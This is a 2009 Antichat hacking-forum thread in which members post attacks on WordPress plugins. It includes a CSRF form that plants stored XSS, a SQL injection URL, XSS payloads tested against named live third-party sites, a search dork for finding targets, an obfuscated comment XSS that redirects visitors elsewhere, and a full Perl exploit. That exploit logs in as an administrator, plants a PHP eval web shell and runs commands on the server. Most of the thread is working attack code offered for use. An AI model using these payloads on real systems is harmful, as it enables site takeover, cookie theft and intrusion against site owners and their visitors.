Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2009, 13:12
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Mood Personalizer
Version: 1.1
Last Updated: 2009-6-11
Downloads: 453
XSS/XSRF
Код:
<form action='http://wordpress/wp-admin/options-general.php?page=mood-personalizer/mood-personalizer.php' method='post' name="xfrm">
<input name="xMPPic" type="text" value='"><script>alert(document.cookie)</script>' />
<input name="xMPHidd" type="text" value='xMPHidd' />
<input type='submit'>
</form>
<script>document.xfrm.submit();</script>
PHP код:
if($_POST['xMPHidd']=="xMPHidd"){
$xMPPicture = $_POST['xMPPic'];
$xMPPictureSize = $_POST['xMPPictureSize'];
$xMPPicture = str_replace(".2",".".$xMPPictureSize,$xMPPicture);
update_option('xMPPic', $xMPPicture);
}
PHP код:
<img src="<?php bloginfo('url'); ?>/wp-content/plugins/mood-personalizer/images/<?php echo get_option('xMPPic');?>" alt="Mood Personalizer mood image"/>
Если виджет вынесен на сайдбар, то получится активка на морде.
__________________
включи голову
|
|
|
16.06.2009, 17:47
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,
Pozdro: Ratman, Kopaczka, FDJ
Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
Vuln:
Код:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all 
# milw0rm.com [2009-06-15]
|
|
|
|
30.06.2009, 19:08
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP код:
89: if($_POST['advanced_twitter_widget_value']!=""){
90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
94: update_option('advanced_twitter_widget_options', serialize($xArrOptions));
95: }
97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Код:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.
|
|
|
|
30.06.2009, 19:09
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
WordPress Plugin ImHuman 0.0.9 XSS Vuln
http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
\imhuman.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP код:
151: if(isset( $_POST['do'] )) {
152: if ( function_exists('current_user_can') && !current_user_can('manage_options') )
153: die(__('Cheatin’ uh?'));
154: check_admin_referer($plugin_page);
155:
156: $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
157: $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
158: $t['imhuman_row'] = $_POST['imhuman_row'];
159: $t['imhuman_col'] = $_POST['imhuman_col'];
160: $t['imhuman_sel'] = $_POST['imhuman_sel'];
161: $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
162: $t['imhuman_word'] = $_POST['imhuman_word'];
163: $t['imhuman_lang'] = $_POST['imhuman_lang'];
164: update_option( 'imhuman_options', $t );
165: $m = '<p>Settings Saved!</p>';
166: }
167: $options = get_option( 'imhuman_options' );
....
194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
195: </tr>
196: <tr>
197: <th><?php _e('ImHuman Ap? Key'); ?></th>
198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
exploit:
Код:
POST: do=.
POST: imhuman_api_user=">{XSS1}<a "
POST: imhuman_api_key=">{XSS1}<a "
POST: imhuman_row=.
POST: imhuman_col=.
POST: imhuman_sel=.
POST: imhuman_word=.
POST: imhuman_lang=.
|
|
|
|
30.06.2009, 22:48
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
http://www.appchain.com/2009/06/live-countdown-timer-1-1/
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
\live-countdown-timer\live-countdown-timer.php
-----------------------------------------------------------------------------
142: $xPostArr[0] = $_POST['live_countdown_timer_Title'];
147: update_option('live_countdown_timer_Values', serialize($xPostArr));
....
149: $xDBArr = unserialize(get_option('live_countdown_timer_Value s'));
150: $live_countdown_timer_Title = $xDBArr[0];
169: <input type="tex...le" value="<?php echo $live_countdown_timer_Title;?>" />
-----------------------------------------------------------------------------
exploit:
POST: live_countdown_timer_days = .
POST: live_countdown_timer_Title = ">{aXSS}<div id="
POST: live_countdown_timer_seconds = 12
POST: live_countdown_timer_hours = 11
POST: live_countdown_timer_days = 10
|
|
|
|
30.06.2009, 22:50
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = . |
|
|
|
02.07.2009, 21:36
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
Код:
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
Dork: "inurl:wp-toolbar.php"
## ## ## ##
eLwaux(c)2009 UASC.org.ua
## ## ## ##
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
## ## ## ##
XSS
/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30: $tourl = $_GET['wp-toolbar-tourl'];
42: $blogtitle = $_GET['wp-toolbar-blogtitle'];
52: <title><?php echo $blogtitle; ?> - Toolbar</title>
56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------
PoC:
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
example:
http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
|
|
|
|
02.07.2009, 21:56
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673
Репутация:
784
|
|
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin') ;
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
такое не стоит публиковать, ибо это практически в каждом плагине и инклуд файле вордпресса ;D
|
|
|
|
15.07.2009, 19:54
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
надо логин:пароль админа 
Код:
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
------------
http://wordpress.org/extend/plugins/add-uroksu-catalog/
Add UROK.su Catalog
Version: 1.03
------------
\wp-content\plugins\add-uroksu-catalog\urok.su.class.php
----------------------------------------------------------------------
|56| if (isset($_POST['UPDATE'])) {
|57| MyUROKsu_user=$_REQUEST['login'];
|58| $file_name=$file_name=dirname(__FILE__).'/login.txt';
|59| $w=fopen($file_name,'w');
|60| fwrite($w,$MyUROKsu_user);
|61| fclose($w);
|62| print($this->update_catalog($MyUROKsu_user));
|63| echo '</p>';
|64| }
----------------------------------------------------------------------
Steps to code execution:
1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
(your code will be saved to file:
/wp-content/plugins/add-uroksu-catalog/login.txt)
2) include this file & code execute:
/wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
perl exploit:
----------------------------------------------------------------------
PHP код:
#! /usr/bin/perl -w
use LWP::UserAgent;
use warnings;
print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n";
print " eLwaux(c)uasc 2009\n\n";
if (!$ARGV[2]) {
print " usage:\n".
" expl.pl http://site.com/wp/index.php adminLogin adminPass\n".
exit(0);
}
my $mHost = $ARGV[0];
my $mAdmL = $ARGV[1];
my $mAdmP = $ARGV[2];
#$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);
my $UA = LWP::UserAgent->new;
$UA->timeout(20);
$UA->default_header('Referer' => $mHost.'wp-login.php');
$UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');
# login to WP
my $page = $UA->post($mHost.'wp-login.php',
{
log => $mAdmL,
pwd => $mAdmP,
# rememberme => 'forever',
submit => 'Войти',
redirect_to => $mHost.'wp-admin/',
testcookie => 1
}
)->as_string;
my $cookie = '';
my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
foreach my $SC (@SetCookie) {
$cookie .= $SC.';';
}
if (length($cookie)<100) {
print ' - bad login:password!';
exit(0);
}
print ' - good login:password!'."\n";
$UA->default_header('Cookie' => $cookie);
print ' .. sending exploit..'."\n";
# send EXPLOIT
$page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
{
login => '<?php @eval($_GET[\'c\']);?>',
UPDATE => 1
}
)->as_string;
print ' + exploit send!'."\n";
# try execute simple code
$page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
print ' + result of test1: '.$1."\n";
print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
} else {
print ' - perhaps code is not injected!'."\n";
}
print ' ! FINISH!'."\n\n";
print ' !! your shell:'."\n";
print ' '.$mHost."\n".
' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";
exit(0);
Код:
----------------------------------------------------------------------
simple result on localhost:
----------------------------------------------------------------------
> expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
WP ] add-uroksu-catalog < 1.03 [ exploit
eLwaux(c)uasc 2009
- good login:password!
.. sending exploit..
+ exploit send!
+ result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
+ result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
! FINISH!
!! your shell:
http://localhost/cms/wordpress/
wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
----------------------------------------------------------------------
Последний раз редактировалось eLWAux; 15.07.2009 в 21:38..
|
|
|
|
22.07.2009, 16:28
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
XSS [Все версии]
Сегодня было опубликована ксс, работает вплоть до текущей версии включительно.
Код:
http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
Для устранения в файле wp-comments-post.php ~40 строку изменяем:
Код:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);
Последний раз редактировалось [underwater]; 22.07.2009 в 16:36..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.gif){kind=avatar}
Похожие темы
Линейный вид
